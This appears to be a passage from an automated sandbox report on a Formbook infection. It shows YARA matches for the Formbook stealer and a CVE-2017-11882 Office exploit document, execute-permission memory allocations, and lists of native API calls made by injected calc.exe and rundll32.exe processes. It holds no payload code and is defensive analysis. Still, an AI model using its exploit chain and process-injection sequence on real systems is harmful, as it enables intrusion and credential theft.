          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A2E2E9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AD1238
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AD63BF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A2F3CF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A563DB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A32305
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A7A37B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A37353
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A65485
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A41489
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AB443E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A6D47D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A4C5F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A3351F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A76540
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A34680
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A3E6C1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AD2622
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A7A634
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A3C7BC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AB579A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A657C3
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00ACF8EE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A5286D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A3C85C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A329B2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AD098E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A469FE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AB394B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AB5955
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AE3A83
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00ADCBA4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00ABDBDA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A2FBD7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A57B00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00ACFDDD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A60D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A3CD5B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A62E2F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A4EE4C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00ACCFB1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00AA2FDC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A40F3F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A5DF7C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02601238
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0255E2E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02567353
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025AA37B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02562305
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025863DB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0255F3CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_026063BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0257905A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02563040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025DD06D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0258D005
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0255E0C6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02602622
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025AA634
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0256E6C1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02564680
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025957C3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025E579A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0256C7BC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0259D47D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025E443E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02595485
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02571489
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025A6540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0256351F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0257C5F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025E05E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02613A83
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02587B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0255FBD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025EDBDA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025E6BCB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0260CBA4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0256C85C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0258286D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025DF8C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025FF8EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025E5955
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025E394B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025769FE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025629B2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0260098E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0257EE4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02592E2F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0258DF7C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02570F3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025D2FDC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025FCFB1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0256CD5B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02590D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025FFDDD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000ED5A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EE7B4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EDA19
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EEB64
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EDCEB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000D2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EDE6B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000D9E60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EEE96
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000D2FB0
          Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
          Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.568094233.0000000006339000.00000004.00000001.sdmp, type: MEMORYMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.562381137.0000000006339000.00000004.00000001.sdmp, type: MEMORYMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A2DF5C appears 120 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A9F970 appears 84 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A7373B appears 245 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A73F92 appears 132 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00A2E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0255E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025A373B appears 245 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0255DF5C appears 123 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025CF970 appears 84 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041A410 NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041A490 NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041A35B NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A20078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A20048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A20060 NtQuerySection,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A2010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A21148 NtOpenThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A207AC NtCreateMutant,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A21930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A20C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A21D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A1FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02550048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02550078 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02550060 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025510D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02551148 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0255010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025501D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02551930 NtSetContextThread,
